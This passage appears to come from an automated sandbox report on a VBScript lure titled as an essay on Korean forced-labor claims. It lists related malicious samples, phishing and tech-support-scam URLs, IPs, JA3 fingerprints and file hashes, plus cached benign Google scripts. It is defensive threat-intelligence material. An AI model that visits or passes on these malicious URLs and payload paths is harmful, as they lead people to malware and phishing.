	SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	104.20.3.235
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.47.24
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse	104.22.24.131
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
	https://19apmacc8.z13.web.core.windows.net/	Get hash	malicious	Unknown	Browse	104.22.24.131
	https://loo54.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-844-621-0495	Get hash	malicious	TechSupportScam	Browse	172.67.208.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://prayas.co/assets/nagateliteqfuk.exe	Get hash	malicious	Unknown	Browse	184.31.62.93 20.12.23.50
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	184.31.62.93 20.12.23.50
	https://28.104-168-101-28.cprapid.com/Pay-PaI/	Get hash	malicious	PayPal Phisher	Browse	184.31.62.93 20.12.23.50
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse	184.31.62.93 20.12.23.50
	https://sharma-sanjana2108.github.io/Microsoft/	Get hash	malicious	Unknown	Browse	184.31.62.93 20.12.23.50
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	184.31.62.93 20.12.23.50
	https://19apmacc8.z13.web.core.windows.net/	Get hash	malicious	Unknown	Browse	184.31.62.93 20.12.23.50
	https://eshoradebitcoin.com/3.dat	Get hash	malicious	PureLog Stealer, zgRAT	Browse	184.31.62.93 20.12.23.50
	https://loo54.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-844-621-0495	Get hash	malicious	TechSupportScam	Browse	184.31.62.93 20.12.23.50
	https://support1-4ec.pages.dev/	Get hash	malicious	TechSupportScam	Browse	184.31.62.93 20.12.23.50
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe	Get hash	malicious	Unknown	Browse	5.9.123.217
	SecuriteInfo.com.Win32.Malware-gen.6467.28521.exe	Get hash	malicious	Unknown	Browse	5.9.123.217
	z42MNA2024000000041-KWINTMADI-11310Y_K.exe	Get hash	malicious	GuLoader, Remcos	Browse	5.9.123.217
	z14Novospedidosdecompra_Profil_4903.exe	Get hash	malicious	GuLoader, Remcos	Browse	5.9.123.217
	file.exe	Get hash	malicious	Vidar	Browse	5.9.123.217
	Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	5.9.123.217
	eOU2MVDmTd.exe	Get hash	malicious	CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT	Browse	5.9.123.217
	SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe	Get hash	malicious	CobaltStrike	Browse	5.9.123.217
	UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe	Get hash	malicious	GuLoader, Remcos	Browse	5.9.123.217
	SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exe	Get hash	malicious	Unknown	Browse	5.9.123.217

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	102
Entropy (8bit):	4.87377555746297
Encrypted:	false
SSDEEP:	3:JSbMqSL1cdXWKQKeHZQx66FTEVgWaee:PLKdXNQKOyo6FIVgL
MD5:	701C50FE2F9D8CFCA61542DEE7684552
SHA1:	952A04F81A291E11F5D4ECD7364A3840412BA65E
SHA-256:	9FC5DFC54DE18E9C98733BBEA6EBDCBC1F01C0B23F985556F24684EE96DC0582
SHA-512:	5CA3C342F4BE563EE68235F32BCB8B25B62215A961B903B3568C496FCAD4508B9408FBDE00C6592085A819826630462863630F888FE73348F13FC037A9AB2C99
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://recaptcha.net/recaptcha/api2/webworker.js?hl=en&v=rz4DvU-cY2JYCwHSTck0_qm-
Preview:	importScripts('https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js');

Chrome Cache Entry: 57

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (554)
Category:	downloaded
Size (bytes):	510578
Entropy (8bit):	5.695280300193632
Encrypted:	false
SSDEEP:	6144:/LJaSgOPDcwWOTEmzYSU9F0Gx95F+SiT1i7uiv5VQgDx212FC:IS4sGx97+SihiSrFIC
MD5:	E9CCB3DBDE79BA5FFDF9CAD4B32D59FD
SHA1:	3A8CD67ADC7C885BDF683F1E7F491E6A4A50679F
SHA-256:	8F2C6777C7CCC01AB67290FA8ACD5A4C4866BE64129F39DFAEB9197DFA15E137
SHA-512:	5CA7C8439030C9B4B966760C660640A094B0D6E30E10DF85D7B900C6F9108B0E309298ED93C006634BB3F437BAB3CFF1B83A5D1B18C666C04346F0856294C461
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. SPDX-License-Identifier: Apache-2.0./.var y=function(){return[function(E,X,B,M,c,v,Y,I,h,J,F,a,C,R,P){return E+4>>3==(E-8<<2>=(R=[1,"F",22],E)&&(E+2&12)<E&&(M=u[32](4,B[R[1]]),P=A[16](32,0,X,B[R[1]],M)),R[0])&&(M=void 0===M?null:M,Y=[3,341,278],c=d[46](16,21,X,u[31](32,B)),J=e[48](7,Y[0],X,u[31](35,X),u[31](28,Y[R[0]])),I=g[27](77,15,u[31](29,X),X,u[31](33,438)),v=u[31](38,Y[2]),a=A[32](R[2],l[13](2,d[9](48,36),X),[u[7](24,v),u[31](34,X)]),C=[c,J,I,a],null!=M&&(h=A[8](73),F=A[8](72),C=[W[30](8,h,u[31](28,B),u[31](37,0))].concat(C,[W[30](8,.F,R[0],R[0]),h,e[39](12,M,X),F])),P=C),P}]}(),g=function(){return[function(E,X,B,M,c,v){return 3<=((((E^(v=[7,"W",2],19))&v[0]\|\|(this[v

Chrome Cache Entry: 58

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5955)
Category:	downloaded
Size (bytes):	252620
Entropy (8bit):	5.5696507893392635
Encrypted:	false
SSDEEP:	3072:u9HzZAZVNSNcMzszFeImk8MjCBPIrTWRvYElfh6St2nBsLqyyLXDeltzvsX5h9A:s1AFMgzFetDLfh6St+aqyyLXDelJsXq
MD5:	46C0A4AF267C59B01D8430AFC58381DF
SHA1:	3C0263E4E995DEC9D859379F8623F7A7A1888520
SHA-256:	E4CE7D4A8FDABADDBA6C0ACDC5C497333EAC44F7C9BA35B3E614594D23A6BB84
SHA-512:	A2A3F7D886EEC9659E282D4E5068D0A16918C9ABF400F3875C002983CD4A3B226442BE40DA3FFD4411BAD38874597A29F66ACF07787ECE39EDDF7E76934DB069
Malicious:	false
Reputation:	low
URL:	https://www.googletagmanager.com/gtag/js?id=G-M2RCV3G3BZ&l=dataLayer&cx=c
Preview:	.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":8,"vtp_value":true,"tag_id":17},{"function":"__ogt_referral_exclusion","priority":8,"vtp_includeConditions":["list","bitninja\\.io"],"tag_id":19},{"function":"__ogt_session_timeout","priority":8,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":20},{"function":"__ogt_dma","priority":8,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":21},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnable

Chrome Cache Entry: 59

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (56398), with no line terminators
Category:	downloaded
Size (bytes):	56398
Entropy (8bit):	5.907604034780877
Encrypted:	false
SSDEEP:	768:+LUmmAWTe2uXYp8Mi+yKYlebyB5lxRx54PHSGdXXwW7MFWwXVuE2:4UcW6v+0B5chXwW49z2
MD5:	EB4BC511F79F7A1573B45F5775B3A99B
SHA1:	D910FB51AD7316AA54F055079374574698E74B35
SHA-256:	7859A62E04B0ACB06516EB12454DE6673883ECFAEAED6C254659BCA7CD59C050
SHA-512:	EC9BDF1C91B6262B183FD23F640EAC22016D1F42DB631380676ED34B962E01BADDA91F9CBDFA189B42FE3182A992F1B95A7353AF41E41B2D6E1DAB17E87637A0
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/styles__ltr.css
Preview:	.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAAACXZwQWcAAABUAAADSAC4K4y8AAA4oElEQVR42u2dCZRV1ZX3q5iE4IQIiKQQCKBt0JLEIUZwCCk7pBNFiRMajZrIl9aOLZ8sY4CWdkDbT2McooaAEmNixFhpaYE2dCiLScWiQHCgoGQoGQuhGArKKl7V+c5/n33fO/V4w733nVuheXuv9V/rrnvP2Xud3zvTPee+ewsKxMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExP4OdtlT6ztAbRWvvLy8A3QkwxzH6tBGMMexI

Chrome Cache Entry: 60

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.75
Encrypted:	false
SSDEEP:	3:H0hCkY:UUkY
MD5:	AFB69DF47958EB78B4E941270772BD6A
SHA1:	D9FE9A625E906FF25C1F165E7872B1D9C731E78E
SHA-256:	874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
SHA-512:	FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmhMwA4cYiJchIFDVNaR8U=?alt=proto
Preview:	CgkKBw1TWkfFGgA=

Chrome Cache Entry: 61

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2343)
Category:	downloaded
Size (bytes):	52916
Entropy (8bit):	5.51283890397623
Encrypted:	false
SSDEEP:	768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
MD5:	575B5480531DA4D14E7453E2016FE0BC
SHA1:	E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
SHA-256:	DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
SHA-512:	174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
Malicious:	false
URL:	https://www.google-analytics.com/analytics.js
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var n=this\|\|self,p=function(a,b){a=a.split(".");var c=n;a[0]in c\|\|"undefined"==typeof c.execScript\|\|c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length\|\|void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r\|\|u();v=v\|\|q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2\|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240\|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192\|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING\|\|[];w.TAGGING[a]=!0};var ba=Array.isArray,c

Chrome Cache Entry: 62

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (554)
Category:	downloaded
Size (bytes):	510578
Entropy (8bit):	5.695280300193632
Encrypted:	false
SSDEEP:	6144:/LJaSgOPDcwWOTEmzYSU9F0Gx95F+SiT1i7uiv5VQgDx212FC:IS4sGx97+SihiSrFIC
MD5:	E9CCB3DBDE79BA5FFDF9CAD4B32D59FD
SHA1:	3A8CD67ADC7C885BDF683F1E7F491E6A4A50679F
SHA-256:	8F2C6777C7CCC01AB67290FA8ACD5A4C4866BE64129F39DFAEB9197DFA15E137
SHA-512:	5CA7C8439030C9B4B966760C660640A094B0D6E30E10DF85D7B900C6F9108B0E309298ED93C006634BB3F437BAB3CFF1B83A5D1B18C666C04346F0856294C461
Malicious:	false
URL:	https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js
Preview:	(function(){/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. SPDX-License-Identifier: Apache-2.0./.var y=function(){return[function(E,X,B,M,c,v,Y,I,h,J,F,a,C,R,P){return E+4>>3==(E-8<<2>=(R=[1,"F",22],E)&&(E+2&12)<E&&(M=u[32](4,B[R[1]]),P=A[16](32,0,X,B[R[1]],M)),R[0])&&(M=void 0===M?null:M,Y=[3,341,278],c=d[46](16,21,X,u[31](32,B)),J=e[48](7,Y[0],X,u[31](35,X),u[31](28,Y[R[0]])),I=g[27](77,15,u[31](29,X),X,u[31](33,438)),v=u[31](38,Y[2]),a=A[32](R[2],l[13](2,d[9](48,36),X),[u[7](24,v),u[31](34,X)]),C=[c,J,I,a],null!=M&&(h=A[8](73),F=A[8](72),C=[W[30](8,h,u[31](28,B),u[31](37,0))].concat(C,[W[30](8,.F,R[0],R[0]),h,e[39](12,M,X),F])),P=C),P}]}(),g=function(){return[function(E,X,B,M,c,v){return 3<=((((E^(v=[7,"W",2],19))&v[0]\|\|(this[v

Chrome Cache Entry: 63

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Chrome Cache Entry: 64

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (17696)
Category:	downloaded
Size (bytes):	18291
Entropy (8bit):	5.675040290596522
Encrypted:	false
SSDEEP:	384:A10ZNodN7X9fo6Gfx+VfvBZbIPGIu/9xJMD5RjTORps0E30cIMW4XdiGZ0ZeaeoR:A10ZY7XNo6Gfx+dvBZkPGt/97K5lTORP
MD5:	8D120D4D5CB207E52720218A143FEF17
SHA1:	DAE68D4F786BDA08FE39D89AB6F3366B1199CB8B
SHA-256:	AC88D994CF1935F39E5504E88EDB7938FB98F589C4D02013F36B46D15F98517D
SHA-512:	4611F40996ABD45761C5D56FD3EE000A3733ED872C6CFA89E112E32104E328AF632B0330C20E125E248F6D5718116D848A1D0CA28F01626CEDE564610319D629
Malicious:	false
URL:	https://www.google.com/js/bg/rIjZlM8ZNfOeVQTojtt5OPuY9YnE0CAT82tG0V-YUX0.js
Preview:	/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t / (function(){var a=this\|\|self,K=function(z,w){if(!(w=(z=null,a.trustedTypes),w)\|\|!w.createPolicy)return z;try{z=w.createPolicy("bg",{createHTML:m,createScript:m,createScriptURL:m})}catch(F){a.console&&a.console.error(F.message)}return z},m=function(z){return z};(0,eval)(function(z,w){return(w=K())&&1===z.eval(w.createScript("1"))?function(F){return w.createScript(F)}:function(F){return""+F}}(a)(Array(7824Math.random()\|0).join("\n")+['(function(){/',.'',.' SPDX-License-Identifier: Apache-2.0',.'/',.'var is=function(z,w){((w.push(z[0]<<24\|z[1]<<16\|z[2]<<8\|z[3]),w).push(z[4]<<24\|z[5]<<16\|z[6]<<8\|z[7]),w).push(z[8]<<24\|z[9]<<16\|z[10]<<8\|z[11])},zc=function(z,w){return z[w]<<24\|z[(w\|0)+1]<<16\|z[(w\|0)+2]<<8\|z[(w\|0)+3]},Fk=function(z,w,a,m,q){(((m=(a=(m=B((w&=(q=w&4,3),z)),B(z)),G)(z,m),q)&&(m=wk(""+m)),w)&&e(a,U(m.length,2),z),e)(a,m,z)},Q=function(z,w,a,m,q,M){if(!w.SQ&&(q=void 0,a&&a[0]===H&&(q=a[2]

Chrome Cache Entry: 65

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
Category:	downloaded
Size (bytes):	15344
Entropy (8bit):	7.984625225844861
Encrypted:	false
SSDEEP:	384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
MD5:	5D4AEB4E5F5EF754E307D7FFAEF688BD
SHA1:	06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
SHA-256:	3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
SHA-512:	7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
Malicious:	false
URL:	https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h\|.l....A....b6........(......@e.]...:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P\|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].\|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)\|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed..'..qP....M..j....../.z&.=...q<....-..?.A.%..K..

Chrome Cache Entry: 66

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4179)
Category:	downloaded
Size (bytes):	202812
Entropy (8bit):	5.538040744688956
Encrypted:	false
SSDEEP:	3072:HKAZVNSNcMzsz5EG8s9CBPIrTW77PeMfK6St2nBsLqQqJqt:qAFMgzsZxfK6St+aqQqJk
MD5:	F6DFCA0D62E452DC8DE2FE0EFA987D8B
SHA1:	A3B2C98B20C893C49432299BDC15F7CFAFDC9DF9
SHA-256:	D77D62E2662E839584201BCB595A8A114DF46567C059F421E98374752A57018F
SHA-512:	CE49403D6F585BFCDD7A76C94A56F20A170E26F285A829C4C832E5AD4DE6EFE6FAA570EE53F20DA1DE5F4ED17AF03E9EB8A4711F446E966E9A379C239B17FFBE
Malicious:	false
URL:	https://www.googletagmanager.com/gtag/js?id=UA-1975075-20
Preview:	.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":2,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":6},{"function":"__c

Chrome Cache Entry: 67

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1532), with no line terminators
Category:	downloaded
Size (bytes):	1532
Entropy (8bit):	5.894840834823538
Encrypted:	false
SSDEEP:	24:2jkm94/zKPczAv+KVCLTLPeYAgFnu5vtTGJTlDTL5ncCxHgFnu5flWtB31ngirLN:VKEztKonjfcvtTARXx/g/1/OXLrwUnG
MD5:	E42D5F70CE6E10B57193160CFE4B1B8D
SHA1:	F1AF5ABA42FAFCD104F01FD750BB5D95B453D741
SHA-256:	7BC6157BEE235C8D1156CAECF1DC01E534C0D6FB06967A28C8165A2173A47588
SHA-512:	AE5C8AE61B44CBA184B5839F7A9F1396316EAB3E086C14096FF5251138391776384E9D90E78FE0AE65A5035FD5D245A01A771A142777F9260B0CC480A3462E61
Malicious:	false
URL:	https://recaptcha.net/recaptcha/api.js
Preview:	/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]\|\|{},N='grecaptcha';var gr=w[N]=w[N]\|\|{};gr.ready=gr.ready\|\|function(f){(cfg['fns']=cfg['fns']\|\|[]).push(f);};w['__recaptcha_api']='https://recaptcha.net/recaptcha/api2/';(cfg['render']=cfg['render']\|\|[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A89JPrWYXvEpNQ/xE+PjjlGJiBu/L2GfQcplC/QkDJOS1fBoX5Q4/HLfT1dXpD1td7C2peXE3bSCJiYdwoFcNgQAAACSeyJvcmlnaW4iOiJodHRwczovL3JlY2FwdGNoYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='3NNj0GXVktLOmVKwWUDendk4Vq2qgMVDBDX+Sni48ATJl9JBj+zF+9W2HGB3pvt6qowOihTbQgTeBm9SKbdTwYAAABfeyJvcmlnaW4iOiJodHRw

Chrome Cache Entry: 68

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:	48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
URL:	https://www.gstatic.com/recaptcha/api2/logo_48.png
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Static File Info

General

File type:	ASCII text, with very long lines (1455), with CRLF line terminators
Entropy (8bit):	4.700504483420511
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Essay on Resolution of Korean Forced Labor Claims.vbs
File size:	27'967 bytes
MD5:	75ec9f68a5b62705c115db5119a78134
SHA1:	6209f948992fd18d4fc6fc6f89d9815369ac8931
SHA256:	ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
SHA512:	82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
SSDEEP:	384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
TLSH:	47C213AE9B2F15418171D6BECBAC014BEE11B0DF16641BB0B7CE512A5F7E0C5A8F942C
